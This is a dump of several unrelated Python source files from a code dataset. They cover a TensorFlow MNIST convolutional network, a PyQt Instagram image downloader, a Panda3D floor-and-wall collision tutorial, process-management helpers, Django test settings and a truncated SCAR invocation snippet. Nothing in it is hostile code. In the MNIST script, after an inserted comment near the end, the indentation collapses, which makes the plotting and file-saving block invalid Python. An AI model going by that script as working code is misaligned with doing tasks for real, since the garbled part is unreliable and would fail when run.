+{"seq_id":"153437309","text":"import numpy as np\nimport tensorflow as tf\nimport os\nfrom datetime import datetime\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport matplotlib.pyplot as plt\nimport shutil\n\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\nlearning_rate = 1e-3\ninput_nodes = 784\noutput_nodes = 10\nepochs = 30\nbatch_size = 100\n\nX = tf.placeholder(tf.float32, [None, input_nodes])\nT = tf.placeholder(tf.float32, [None, output_nodes])\n\nA1 = X_img = tf.reshape(X, [-1, 28, 28, 1])\n\nW2 = tf.Variable(tf.random.normal([3,3,1,32], stddev=0.01))\nb2 = tf.Variable(tf.random.normal([32]))\n\nC2 = tf.nn.conv2d(A1, W2, strides=[1,1,1,1], padding='SAME')\nZ2 = tf.nn.relu(C2 + b2)\nA2 = P2 = tf.nn.max_pool(Z2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\nA2_img = tf.reshape(A2, [-1, 14, 14, 32])\n\nW3 = tf.Variable(tf.random.normal([3,3,32,32], stddev=0.01))\nb3 = tf.Variable(tf.random.normal([32]))\n\nC3 = tf.nn.conv2d(A2_img, W3, strides=[1,1,1,1], padding=\"SAME\")\nZ3 = tf.nn.relu(C3+b3)\nA3 = P3 = tf.nn.max_pool(Z3, ksize=[1,2,2,1], strides=[1,2,2,1], padding=\"SAME\")\nA3_flat = P3_flat = tf.reshape(A3, [-1, 7,7,32])\n\nW4 = tf.Variable(tf.random_normal([3,3,32,32], stddev=0.01))\nb4 = tf.Variable(tf.random.normal([32]))\n\nC4 = tf.nn.conv2d(A3_flat, W4, strides=[1,1,1,1], padding=\"SAME\")\nZ4 = tf.nn.relu(C4+b4)\nA4 = tf.nn.max_pool(Z4, ksize=[1,2,2,1], strides=[1,2,2,1], padding=\"SAME\")\nA4_flat = tf.reshape(A4, [-1,4*4*32])\n\nW5 = tf.Variable(tf.random_normal([4*4*32, 10]))\nb5 = tf.Variable(tf.random_normal([10]))\n\nZ5 = logits = tf.matmul(A4_flat, W5) + b5\ny = A5 = tf.nn.softmax(Z5)\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=Z5, labels=T))\n\noptimizer = tf.train.AdamOptimizer(learning_rate)\ntrain = optimizer.minimize(loss)\n\npredicted = tf.equal(tf.argmax(A5, 1), tf.argmax(T,1))\naccuracy = tf.reduce_mean(tf.cast(predicted, dtype=tf.float32))\n\nwith tf.Session() as sess:\n    sess.run(tf.global_variables_initializer())\n    start_time = datetime.now()\n\n    for i in range(epochs):\n        total_batch = int(mnist.train.num_examples / batch_size)\n        for step in range(total_batch):\n            batch_x_data, batch_t_data = mnist.train.next_batch(batch_size)\n            loss_val, train_val = sess.run([loss, train], feed_dict={X: batch_x_data, T:batch_t_data})\n\n            if step % 10 == 0:\n                print(\"epochs =\", i, \", step =\", step, \", loss_val =\", loss_val)\n    end_time = datetime.now()\n    print(\"\\nelapsed time =\", end_time - start_time)\n\n    test_x_data = mnist.test.images\n    test_t_data = mnist.test.labels\n\n    A5_val, predicted_val, accuracy_val = sess.run([A5, predicted, accuracy], feed_dict = {X: test_x_data, T: test_t_data})\n    print(\"\\nAccuracy_val\", accuracy_val)\n\n    end_time = datetime.now()\n    print(\"Time spent\", end_time - start_time)\n\n    temp_list = []\n    index_label_false_list = []\n    np_false_number = np.zeros([10])\n\n    for index in range(len(predicted_val)):\n        if predicted_val[index] == False:\n            temp_list.append(index)\n            temp_list.append(np.argmax(test_t_data[index]))\n            temp_list.append(np.argmax(A5_val[index]))\n            index_label_false_list.append(temp_list)\n            temp_list = []\n            np_false_number[np.argmax(test_t_data[index])] += 1\n        else:\n            pass\n    print(index_label_false_list)\n    
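# np_false_number[i] counts how many test images with true label i were misclassified\n    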
print(np_false_number)\n #for index in range(len(index_label_false_list)):\n curr_dir = os.getcwd()\n print(os.getcwd())\n deeplearning_path = 'C:\\\\Users\\\\user\\\\PycharmProjects\\\\DeepLearning'\n\n first_file_name = 'mnist_false_figure'\n now = datetime.now()\n file_name = first_file_name + str(now.year)+'_' + str(now.month)+'_' + str(now.day)+'_' + str(now.hour)+'_' + str(now.minute)\n direct = deeplearning_path+'\\\\'+file_name\n if os.path.exists(direct):\n shutil.rmtree(direct)\n os.mkdir(direct)\n os.chdir(direct)\n\n for index in range(len(index_label_false_list)):\n plt.title(\"label = \"+str(index_label_false_list[index][1])+\" prediction = \"+str(index_label_false_list[index][2]))\n img = test_x_data[index_label_false_list[index][0], :].reshape(28, 28)\n plt.imshow(img, cmap='gray')\n fig = plt.gcf()\n fig.savefig(str(index_label_false_list[index][0])+'.png')\n if index % 10 == 0:\n print(\"index =\", index, \"images are saved!\")\n os.chdir(curr_dir)","sub_path":"DeepLearning/tensorflow/tensorflow_covolution_mnist_c3.py","file_name":"tensorflow_covolution_mnist_c3.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"484797622","text":"#!/usr/bin/env python\n\n\"\"\"\n Instagram Downloader\n --------------------\n Version: 1.0\n Author: Arian Giles García\n Date: 27/09/2015\n\"\"\"\n\nimport os\nimport sys\nimport shutil\nimport urllib.request\n\nfrom bs4 import BeautifulSoup\nfrom PyQt4 import QtCore, QtGui\n\nimport resources\n\nAUX_FILE_PATH = \"../img/aux.jpg\"\n\nclass MainWindow(QtGui.QMainWindow):\n __version = \"v1.0\"\n __initialized = 0\n\n def __init__(self):\n super(MainWindow, self).__init__()\n self.setup_ui()\n\n # Setup Worker\n self.worker = WorkerThread()\n self.connect(self.worker, QtCore.SIGNAL(\"threadDone()\"), self.show_picture)\n self.connect(self.worker, QtCore.SIGNAL(\"threadError()\"), self.show_error)\n\n self.show()\n\n def setup_ui(self):\n # Main Window\n self.screen_size = (QtGui.QApplication.desktop().screen().rect().width(), QtGui.QApplication.desktop().screen().rect().height())\n self.window_size = (550, 700)\n\n self.setGeometry(self.screen_size[0] / 2 - self.window_size[0] / 2,\n self.screen_size[1] / 2 - self.window_size[1] / 2,\n self.window_size[0], self.window_size[1])\n\n self.setMaximumSize(self.window_size[0], self.window_size[1])\n self.setMinimumSize(self.window_size[0], self.window_size[1])\n\n self.setWindowTitle(\"Instagram Downloader\" + \" \" + self.__version)\n self.setWindowIcon(QtGui.QIcon(\":img/icon.png\"))\n\n # Main Window Color\n self.palette = QtGui.QPalette()\n self.color = QtGui.QColor(63, 114, 155)\n self.palette.setColor(QtGui.QPalette.Background, self.color)\n self.setPalette(self.palette)\n\n # Menu Bar\n save_action = QtGui.QAction(\"&Save\", self)\n save_action.setShortcut(\"Ctrl+S\")\n save_action.setStatusTip(\"Save the picture\")\n save_action.triggered.connect(self.save_picture)\n\n exit_action = QtGui.QAction(\"&Exit\", self)\n exit_action.setShortcut(\"Ctrl+Q\")\n exit_action.setStatusTip(\"Leave the app\")\n exit_action.triggered.connect(self.exit_app)\n\n about_action = QtGui.QAction(\"&About\", self)\n about_action.setStatusTip(\"Shows information about the application\")\n about_action.triggered.connect(self.show_about)\n\n # Status Bar\n self.status_bar = QtGui.QStatusBar(self)\n self.color = QtGui.QColor(52, 94, 128)\n self.palette.setColor(QtGui.QPalette.Background, self.color)\n 
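# darker blue than the main window for the status bar, with white text for contrast\n        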
self.palette.setColor(QtGui.QPalette.Foreground, QtCore.Qt.white)\n\n self.status_bar.setPalette(self.palette)\n self.setStatusBar(self.status_bar)\n\n mainMenu = self.menuBar()\n\n fileMenu = mainMenu.addMenu(\"&File\")\n fileMenu.addAction(save_action)\n fileMenu.addSeparator()\n fileMenu.addAction(exit_action)\n\n fileMenu = mainMenu.addMenu(\"&Help\")\n fileMenu.addAction(about_action)\n\n # Label (Title)\n self.label = QtGui.QLabel(self)\n self.label_img = QtGui.QPixmap(\":img/header.png\")\n self.label.setPixmap(self.label_img)\n self.label.move(0, 30)\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n\n # Label Font\n font = QtGui.QFont()\n font.setFamily(\"Sans Serif\")\n font.setPointSize(30)\n self.label.setFont(font)\n\n self.label.resize(self.label.minimumSizeHint())\n self.label.setFixedWidth(550)\n\n # Line Edit\n self.url_text = QtGui.QLineEdit(self)\n self.url_text.setFixedWidth(400)\n self.url_text.move(10, 110)\n\n # Button\n self.download_button = QtGui.QPushButton(self)\n self.download_button.setText(\"Download\")\n self.download_button.setFixedWidth(120)\n self.download_button.move(420, 110)\n self.download_button.pressed.connect(self.button_pushed)\n\n # Picture Label\n self.picture_label = QtGui.QLabel(self)\n self.picture = QtGui.QPixmap(\":img/placeholder.png\")\n self.picture_label.setPixmap(self.picture)\n self.picture_label.resize(self.picture_label.minimumSizeHint())\n self.picture_label.move(25, 155)\n self.picture_label.setAlignment(QtCore.Qt.AlignCenter)\n\n def show_about(self):\n self.about = WindowAbout(self)\n self.about.exec_()\n\n def show_error(self):\n QtGui.QMessageBox.information(self,\n \"Error\",\n \"There was an error.\\n Please make sure you've entered a valid instagram URL\",\n QtGui.QMessageBox.Ok)\n\n def save_picture(self):\n if self.__initialized:\n picture_file_name = \"Picture.jpg\"\n file_name = QtGui.QFileDialog.getSaveFileName(self, 'Save picture', picture_file_name, filter='*.jpg')\n\n if file_name.split(\".\")[-1] != \"jpg\":\n file_name += \".jpg\"\n\n shutil.copyfile(AUX_FILE_PATH, file_name)\n else:\n QtGui.QMessageBox.information(self,\n \"Instagram Downloader\",\n \"There is no picture to save\",\n QtGui.QMessageBox.Ok)\n\n def button_pushed(self):\n self.worker.set_url(self.url_text.text())\n self.worker.start()\n\n def show_picture(self):\n self.picture = QtGui.QPixmap(AUX_FILE_PATH)\n self.picture = self.picture.scaled(500, 500, QtCore.Qt.KeepAspectRatio)\n self.picture_label.setPixmap(self.picture)\n\n self.url_text.setText(\"\")\n\n self.__initialized = 1\n\n def exit_app(self):\n if self.__initialized:\n choice = QtGui.QMessageBox.question(self,\n \"Exit\",\n \"Sure you wanna quit?\",\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,\n QtGui.QMessageBox.No) # No selected by default\n\n if choice == QtGui.QMessageBox.Yes:\n try:\n os.remove(AUX_FILE_PATH)\n self.about.close()\n except:\n pass\n else:\n return\n\n sys.exit()\n\n def closeEvent(self, event):\n if self.__initialized:\n choice = QtGui.QMessageBox.question(self,\n \"Exit\",\n \"Sure you wanna quit?\",\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,\n QtGui.QMessageBox.No) # No selected by default\n\n if choice == QtGui.QMessageBox.Yes:\n event.accept()\n try:\n os.remove(AUX_FILE_PATH)\n self.about.close()\n except:\n pass\n else:\n event.ignore()\n else:\n try:\n os.remove(AUX_FILE_PATH)\n except:\n pass\n\n try:\n self.about.close()\n except:\n pass\n\n event.accept()\n\n\nclass InstaDownParser:\n def get_picture_link(self, url):\n try:\n response = 
urllib.request.urlopen(url).read()\n soup = BeautifulSoup(response)\n\n for item in soup.find_all(\"meta\", {\"property\": \"og:image\"}):\n picture_link = item.get(\"content\")\n return picture_link\n\n except:\n return None\n\n def save_picture(self, picture_link, file_name):\n if picture_link is None:\n pass\n else:\n urllib.request.urlretrieve(picture_link, file_name)\n\n\nclass WorkerThread(QtCore.QThread):\n def __init__(self):\n super(WorkerThread, self).__init__()\n\n def run(self):\n parser = InstaDownParser()\n link = parser.get_picture_link(self.url)\n if link is None:\n self.emit(QtCore.SIGNAL(\"threadError()\"))\n else:\n parser.save_picture(link, AUX_FILE_PATH)\n self.emit(QtCore.SIGNAL(\"threadDone()\"))\n\n def set_url(self, url):\n self.url = url\n\n\nclass WindowAbout(QtGui.QDialog):\n def __init__(self, parent=None):\n super(WindowAbout, self).__init__()\n self.setup_ui()\n self.show()\n\n def setup_ui(self):\n # Main Window\n self.screen_size = (QtGui.QApplication.desktop().screen().rect().width(), QtGui.QApplication.desktop().screen().rect().height())\n self.window_size = (480, 280)\n\n self.setGeometry(self.screen_size[0] / 2 - self.window_size[0] / 2,\n self.screen_size[1] / 2 - self.window_size[1] / 2,\n self.window_size[0], self.window_size[1])\n\n self.setMaximumSize(self.window_size[0], self.window_size[1])\n self.setMinimumSize(self.window_size[0], self.window_size[1])\n\n self.setWindowTitle(\"Instagram Downloader\")\n self.setWindowIcon(QtGui.QIcon(\":img/icon.png\"))\n\n # Main Window Color\n self.palette = QtGui.QPalette()\n self.color = QtGui.QColor(63, 114, 155)\n self.palette.setColor(QtGui.QPalette.Background, self.color)\n self.setPalette(self.palette)\n\n # Title\n self.label = QtGui.QLabel(self)\n self.label_img = QtGui.QPixmap(\":img/header.png\")\n self.label.setPixmap(self.label_img)\n self.label.setMinimumSize(self.label.minimumSizeHint())\n self.label.move(10, 20)\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n\n # Description\n self.description = QtGui.QLabel(self)\n\n # Label Font\n font = QtGui.QFont()\n font.setFamily(\"Sans Serif\")\n font.setPointSize(11)\n self.description.setFont(font)\n\n # Description\n self.description.setText(\"Instagram downloader is a simple application that lets you \\n\"\n \"easily download instagram pictures to your computer.\\n\\n\"\n \"Coded by Arian Giles García.\\n\"\n \"Córdoba, Argentina.\\n\"\n \"2015.\\n\")\n\n self.description.resize(self.description.minimumSizeHint())\n\n move_distance = (self.window_size[0] - self.description.width())/2\n self.description.move(move_distance, 110)\n\n # Label Text Color\n color = QtGui.QColor(200, 200, 255)\n self.description.setStyleSheet(\"QWidget {color: %s}\" % color.name())\n self.description.setAlignment(QtCore.Qt.AlignCenter)\n\n # Close Button\n self.close_button = QtGui.QPushButton(self)\n self.close_button.setText(\"Close\")\n self.close_button.move(195, 240)\n self.close_button.pressed.connect(self.close)\n\n\ndef run():\n app = QtGui.QApplication(sys.argv)\n gui = MainWindow()\n sys.exit(app.exec_())\n\n\nrun()\n","sub_path":"instagram-downloader/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"616083876","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCollisionHandlerFloor - how to steer an avatar on a uneven terrain keeping it grounded.\n\nby fabius astelix @2010-01-25\n\nLevel: INTERMEDIATE\n\nWe'll see how to settle up a scene 
to have a movable avatar follow the Z-height of an uneven terrain. All of this is driven by the Panda3D CollisionHandlerFloor collision handler.\n\nNOTE If some line of code is not explained here, it was probably covered in a previous step - if it is not there either, or still is not clear to you, browse http://www.panda3d.org/phpbb2/viewtopic.php?t=7918 and post your issue to the thread.\n\nBast Centipede by Fernando Gurgel @2015\n\n\"\"\"\n\nimport direct.directbase.DirectStart\nimport json\nfrom pandac.PandaModules import *\nfrom direct.directtools.DirectGeometry import LineNodePath\nfrom direct.gui.OnscreenText import OnscreenText\nfrom panda3d.core import ColorAttrib\nfrom panda3d.core import *\nfrom panda3d.ode import *\nfrom direct.task import Task\nimport sys\nimport time\n\nfrom direct.showbase.DirectObject import DirectObject\nfrom pandac.PandaModules import CollisionHandlerFloor, CollisionNode, CollisionTraverser, BitMask32, CollisionRay\n\nfrom pandac.PandaModules import loadPrcFileData\nloadPrcFileData(\"\", \"\"\"sync-video 0\n\"\"\"\n)\n#** snippet support routines - not concerning the tutorial part\nimport snipstuff\n\ndef drawLines():\n    # Draws lines between the smiley and frowney.\n    lines.reset()\n    lines.drawLines([((art.getX(), art.getY(), art.getZ()),\n\t\t\t\t\t(avatar.getX(), avatar.getY(), avatar.getZ())),\n\t\t\t\t ((avatar.getX(), avatar.getY(), avatar.getZ()),\n\t\t\t\t\t(0, 0, 0))])\n    lines.create()\n\n\n\ndef updateTask(task):\n\tupdatePlayer()\n\t#updateCamera()\n\treturn Task.cont\n\n\ndef checkjson():\n\ttime.sleep(0.1)\n\ttry:\n\t\tjson_data = open('cmd.json').read()\n\t\tdata = json.loads(json_data)\n\t\tdirection1 = data[\"direction1\"]\n\t\tdirection2 = data[\"direction2\"]\n\t\tdirection3 = data[\"direction3\"]\n\t\tintensity1 = int(data[\"intensity1\"])\n\t\tintensity2 = int(data[\"intensity2\"])\n\t\tintensity3 = int(data[\"intensity3\"])\n\t\trotz = data[\"rotation\"]\n\t\treturn direction1, direction2, direction3, intensity1, intensity2, intensity3, rotz\n\texcept Exception:\n\t\treturn \"down\", \"down\", \"down\", 0, 0, 0, 0\n\n\n\n\ndef updatePlayer():\n\t\n\t(direction1, direction2, direction3, intensity1, intensity2, intensity3, rotz) = checkjson()\n\tif (direction1==\"up\"):\n\t\tart.setZ(avatar.getZ()+abs(intensity1))\n\t\tavatar.setHpr(0,90,rotz)\t\t\n\telif (direction1==\"down\"):\n\t\tart.setZ(avatar.getZ()-abs(intensity1))\n\t\tavatar.setHpr(0,90,rotz)\t\n\tif (direction2==\"up\"):\n\t\tart2.setZ(avatar.getZ()+abs(intensity2))\t\n\t\tart2.setHpr(0,0,intensity2*10)\t\t\n\telif (direction2==\"down\"):\n\t\tart2.setZ(avatar.getZ()-abs(intensity2))\n\t\tart2.setHpr(0,0,intensity2*10)\t\n\tif (direction3==\"up\"):\n\t\tart3.setZ(avatar.getZ()+abs(intensity3))\t\t\n\t\tart3.setHpr(0,0,intensity3*10)\t\n\telif (direction3==\"down\"):\n\t\tart3.setZ(avatar.getZ()-abs(intensity3))\n\t\tart3.setHpr(0,0,intensity3*10)\t\n\n\ndef updateCamera():\n\t# see issue content for how we calculated these:\n\tcamera.setPos(player2, 25.6225, 3.8807, 10.2779)\n\tcamera.setHpr(player2,94.8996,-16.6549,1.55508)\n\n\n#=========================================================================\n# Scenographic stuff\n#=========================================================================\nbase.cam.setPos(40, -70, 35)\n\nsplash=snipstuff.splashCard()\nsnipstuff.info.append(\"Collisions With Floor and Walls in action\")\nsnipstuff.info.append(\"a minimal sample to show how to keep an 
avatar grounded and blocked by invisible walls\")\nsnipstuff.info.append(\"WASD=move the avatar around\\nSPACE=avatar hiccup\")\nsnipstuff.info_show()\n\n#=========================================================================\n# Main\n\"\"\"\nStarting from step1, we just put an additional collision handler to take care to keep the avatar grounded. This will PUSH the avatar back as soon as hit geometry we settled to be a wall: in blender we modelled polygons to wrap around the little house and all around the terrain area so that this time the avatar, differently from step1, won't pass through the house and won't be able to leave the terrain perimeter anymore. I suggest you to open the blender source to find out what I'm talking about here.\n\"\"\"\n#=========================================================================\n\n#** Collision system ignition\nbase.cTrav=CollisionTraverser()\n# did you saw this stuff in step1?\nfloorHandler = CollisionHandlerFloor()\nfloorHandler.setMaxVelocity(14)\n# here it is the new fella - this will take care to push the avatar off the walls\nwallHandler = CollisionHandlerPusher()\n\n#** As you know this mask is used to mark the geometries for the floor collisions...\nFLOOR_MASK=BitMask32.bit(1)\n#... and this time we need another one to mark the walls as well.\nWALL_MASK=BitMask32.bit(2)\n\n#** This is our steering avatar - this time we use a little different setup, more close to real applications: we wrap either the avatar and its collision ray into another nodepath. This way we add lotta flexibility allowing us to make fancy things like you'll see below, to make the avatar rolling while steering, a thing not possible before and also to get rid of the global floorHandler.setOffset(1.0) shift, to set our avatar precisly placed above the surface.\navatarNP=NodePath('smileyNP')\navatarNP.reparentTo(base.render)\n\navatar = loader.loadModel('cilindroB')\navatar.reparentTo(avatarNP)\n# since our avatar origin is centered in a model sized 2,2,2, we need to shift it 1 unit above the ground and this time we make this happen shifting it off its own root node (avatarNP)\navatar.setPos(0,0,1)\navatar.setHpr(0,90,0)\navatar.setColor(0, 0, 1, 1)\navatar.setCollideMask(BitMask32.allOff())\n\nart = loader.loadModel('cilindroR')\nart.reparentTo(avatar)\n# since our avatar origin is centered in a model sized 2,2,2, we need to shift it 1 unit above the ground and this time we make this happen shifting it off its own root node (avatarNP)\nart.setPos(avatar.getX(),avatar.getY(), avatar.getZ())\nart.setColor(1, 0, 0, 1)\nart.setCollideMask(BitMask32.allOff())\n\navatar2 = loader.loadModel('cilindroB')\navatar2.reparentTo(art)\n# since our avatar origin is centered in a model sized 2,2,2, we need to shift it 1 unit above the ground and this time we make this happen shifting it off its own root node (avatarNP)\navatar2.setPos(art.getX(),art.getY(), art.getZ()+3.325)\navatar2.setColor(1, 1, 0, 1)\navatar2.setCollideMask(BitMask32.allOff())\n\nart2 = loader.loadModel('cilindroR')\nart2.reparentTo(avatar2)\n# since our avatar origin is centered in a model sized 2,2,2, we need to shift it 1 unit above the ground and this time we make this happen shifting it off its own root node (avatarNP)\nart2.setPos(avatar2.getX(),avatar2.getY(), avatar2.getZ())\nart2.setColor(1, 0, 0,1)\nart2.setCollideMask(BitMask32.allOff())\n\navatar3 = loader.loadModel('cilindroB')\navatar3.reparentTo(art2)\n# since our avatar origin is centered in a model sized 2,2,2, we need to shift it 1 unit above 
the ground and this time we make this happen shifting it off its own root node (avatarNP)\navatar3.setPos(art2.getX(),art2.getY(), art2.getZ())\navatar3.setColor(1, 0.5, 0, 1)\navatar3.setCollideMask(BitMask32.allOff())\n\nart3 = loader.loadModel('cilindroR')\nart3.reparentTo(avatar3)\n# since our avatar origin is centered in a model sized 2,2,2, we need to shift it 1 unit above the ground and this time we make this happen shifting it off its own root node (avatarNP)\nart3.setPos(avatar3.getX(),avatar3.getY(), avatar3.getZ())\nart3.setColor(1, 0, 0,1)\nart3.setCollideMask(BitMask32.allOff())\n\n\n\n\navatarNP.setPos(0,0,15)\n# we reintroduced in this snippet the renowned smiley collision sphere - we need it as low-poly collision geometry for the wall collision handler to know when the smiley hit a wall.\navatarCollider = avatar.attachNewNode(CollisionNode('smileycnode'))\navatarCollider.node().addSolid(CollisionSphere(0, 0, 0, 1))\n# of course we mark it with the wall mask\navatarCollider.node().setFromCollideMask(WALL_MASK)\navatarCollider.node().setIntoCollideMask(BitMask32.allOff())\n\n# we reintroduced in this snippet the renowned smiley collision sphere - we need it as low-poly collision geometry for the wall collision handler to know when the smiley hit a wall.\nartCollider = art.attachNewNode(CollisionNode('smileycnode'))\nartCollider.node().addSolid(CollisionSphere(avatar.getX(),avatar.getY(), avatar.getZ(), 1))\n# of course we mark it with the wall mask\nartCollider.node().setFromCollideMask(BitMask32.allOff())\n\n\n# we reintroduced in this snippet the renowned smiley collision sphere - we need it as low-poly collision geometry for the wall collision handler to know when the smiley hit a wall.\navatar2Collider = avatar2.attachNewNode(CollisionNode('smileycnode'))\navatar2Collider.node().addSolid(CollisionSphere(art.getX(),art.getY(), art.getZ()+3.325, 1))\n# of course we mark it with the wall mask\navatar2Collider.node().setFromCollideMask(BitMask32.allOff())\n\n\n# we reintroduced in this snippet the renowned smiley collision sphere - we need it as low-poly collision geometry for the wall collision handler to know when the smiley hit a wall.\nart2Collider = art2.attachNewNode(CollisionNode('smileycnode'))\nart2Collider.node().addSolid(CollisionSphere(avatar2.getX(),avatar2.getY(), avatar2.getZ(), 1))\n# of course we mark it with the wall mask\nart2Collider.node().setFromCollideMask(BitMask32.allOff())\n\n\n\n\n#** Here we stick and set the ray collider to the avatar - note that we set it well above the avatar position because like this we are sure to always find a floor surface higher than the avatar top - try to change the third value i.e. 
to 0 and see what happens while steering the avatar, to get what I mean\nraygeometry = CollisionRay(0, 0, 2, 0, 0, -1)\navatarRay = avatarNP.attachNewNode(CollisionNode('avatarRay'))\navatarRay.node().addSolid(raygeometry)\n# this is how we tell the collision system that this ray should collide just with the floor, acting as a FROM collider.\navatarRay.node().setFromCollideMask(FLOOR_MASK)\n# we then exclude the ray from acting as an INTO collider\navatarRay.node().setIntoCollideMask(BitMask32.allOff())\n\n\n\n\n#** This is the terrain map - the egg model loaded also contains the collider geometry for the terrain and for the walls as children\nterrain = loader.loadModel(\"scene1\")\nterrain.reparentTo(render)\nterrain.setCollideMask(BitMask32.allOff())\nterrain.setScale(16)\n# here is how we tell the collision system that the terrain collider geometry is allowed to collide with the avatar ray as an INTO collider...\nfloorcollider=terrain.find(\"**/floor_collide\")\nfloorcollider.node().setIntoCollideMask(FLOOR_MASK)\n#...and the same goes for the walls\nwallcollider=terrain.find(\"**/wall_collide\")\nwallcollider.node().setIntoCollideMask(WALL_MASK)\n\n#** as said in step1 we tell our collision handlers which nodes take part in their respective tasks: for the floor, the avatar ray and the avatar nodepath...\nfloorHandler.addCollider(avatarRay, avatarNP)\n# ...and for the walls the avatar sphere collider together with - again - the avatar nodepath\nwallHandler.addCollider(avatarCollider, avatarNP)\n\nwallHandler.addCollider(artCollider, avatarNP)\nwallHandler.addCollider(avatar2Collider, avatarNP)\nwallHandler.addCollider(art2Collider, avatarNP)\n\n#** Now we're ready to start the collisions, using the avatar ray to fire collisions for the floorHandler...\nbase.cTrav.addCollider(avatarRay, floorHandler)\n# ... 
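The floor/wall wiring above is easier to see in isolation. Below is a minimal, self-contained sketch of the same CollisionHandlerFloor pattern; the model name 'scene1' and the '**/floor_collide' sub-node are assumptions carried over from the snippet, so substitute your own assets.

```python
# Minimal sketch: keep a node glued to uneven ground with CollisionHandlerFloor.
# 'scene1' and '**/floor_collide' are assumed assets mirroring the snippet above.
from direct.showbase.ShowBase import ShowBase
from panda3d.core import (BitMask32, CollisionHandlerFloor, CollisionNode,
                          CollisionRay, CollisionTraverser)

FLOOR_MASK = BitMask32.bit(1)

app = ShowBase()
app.cTrav = CollisionTraverser()
floor_handler = CollisionHandlerFloor()

avatar_np = app.render.attachNewNode('avatarNP')
ray_np = avatar_np.attachNewNode(CollisionNode('avatarRay'))
ray_np.node().addSolid(CollisionRay(0, 0, 2, 0, 0, -1))  # start above, point down
ray_np.node().setFromCollideMask(FLOOR_MASK)   # the ray acts only as a FROM collider
ray_np.node().setIntoCollideMask(BitMask32.allOff())

terrain = app.loader.loadModel('scene1')       # assumed model with collide geometry
terrain.reparentTo(app.render)
terrain.find('**/floor_collide').node().setIntoCollideMask(FLOOR_MASK)

floor_handler.addCollider(ray_np, avatar_np)   # the handler moves avatar_np in Z
app.cTrav.addCollider(ray_np, floor_handler)
app.run()
```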
and the sphere for the wallHandler\nbase.cTrav.addCollider(avatarCollider, wallHandler)\n\nbase.cTrav.addCollider(artCollider, wallHandler)\nbase.cTrav.addCollider(avatar2Collider, wallHandler)\nbase.cTrav.addCollider(art2Collider, wallHandler)\n\n# A task to run every frame, some keyboard setup and our speed\ntaskMgr.add(updateTask, \"update\")\n#** Activating avatar steering function - now we're ready to go\nsteering=snipstuff.avatar_steer(avatarNP, fwspeed=12.)\nsteering.start()\nsplash.destroy()\nbase.run()\n","sub_path":"mao5.py","file_name":"mao5.py","file_ext":"py","file_size_in_byte":11935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"105361158","text":"import os\nimport signal\nimport subprocess\nimport utils.logger as logger\nimport json\n\n_cur_dir = os.path.dirname(os.path.realpath(__file__))\n\n\ndef load_json(json_path):\n with open(json_path, 'r') as jp:\n obj = json.load(jp)\n return obj\n\n\ndef save_json(json_path, obj):\n with open(json_path, 'w') as jp:\n json.dump(obj, jp)\n return True\n\n\ndef check_running_proc(proc_name):\n \"\"\"\n Check if a process is running or not\n :param proc_name:\n :return:\n \"\"\"\n try:\n if len(os.popen(\"ps -aef | grep -i '%s' \"\n \"| grep -v 'grep' | awk '{ print $3 }'\" % proc_name).read().strip().splitlines()) > 0:\n return True\n except Exception as e:\n logger.error('Failed to get status of the process({}) - {}'.format(proc_name, e))\n return False\n\n\ndef kill_process_by_name(proc_name):\n \"\"\"\n Kill process by its name\n :param proc_name:\n :return:\n \"\"\"\n p = subprocess.Popen(['ps', '-A'], stdout=subprocess.PIPE)\n out, err = p.communicate()\n for line in out.decode().splitlines():\n if proc_name in line:\n pid = int(line.split(None, 1)[0])\n print('Found PID({}) of `{}`, killing...'.format(pid, proc_name))\n os.kill(pid, signal.SIGKILL)\n","sub_path":"utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"47009255","text":"import os\n\n\nDEBUG = True\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n }\n}\n\nINSTALLED_APPS = (\n \"test_without_migrations\",\n \"form_renderers\",\n \"form_renderers.tests\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sites\",\n)\n\nCACHES = {\n \"default\": {\n \"BACKEND\": \"django.core.cache.backends.locmem.LocMemCache\",\n }\n}\n\nSITE_ID = 1\n\nSECRET_KEY = \"SECRET_KEY\"\n\nFORM_RENDERERS = {\"enable-bem-classes\": True}\n","sub_path":"form_renderers/tests/settings/111.py","file_name":"111.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"318551582","text":"# SCAR - Serverless Container-aware ARchitectures\n# Copyright (C) GRyCAP - I3M - UPV\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport requests\n\ndef invoke_function(url, parameters=None, 
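check_running_proc above shells out through os.popen with a grep pipeline. As a point of comparison, here is a sketch of the same check via subprocess and POSIX pgrep; pgrep and its -f flag are assumptions about the target platform.

```python
import subprocess

def is_running(proc_name):
    """Return True if any process command line matches proc_name (POSIX pgrep)."""
    result = subprocess.run(['pgrep', '-f', proc_name], stdout=subprocess.DEVNULL)
    return result.returncode == 0  # pgrep exits 0 when at least one match exists

print(is_running('python'))
```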
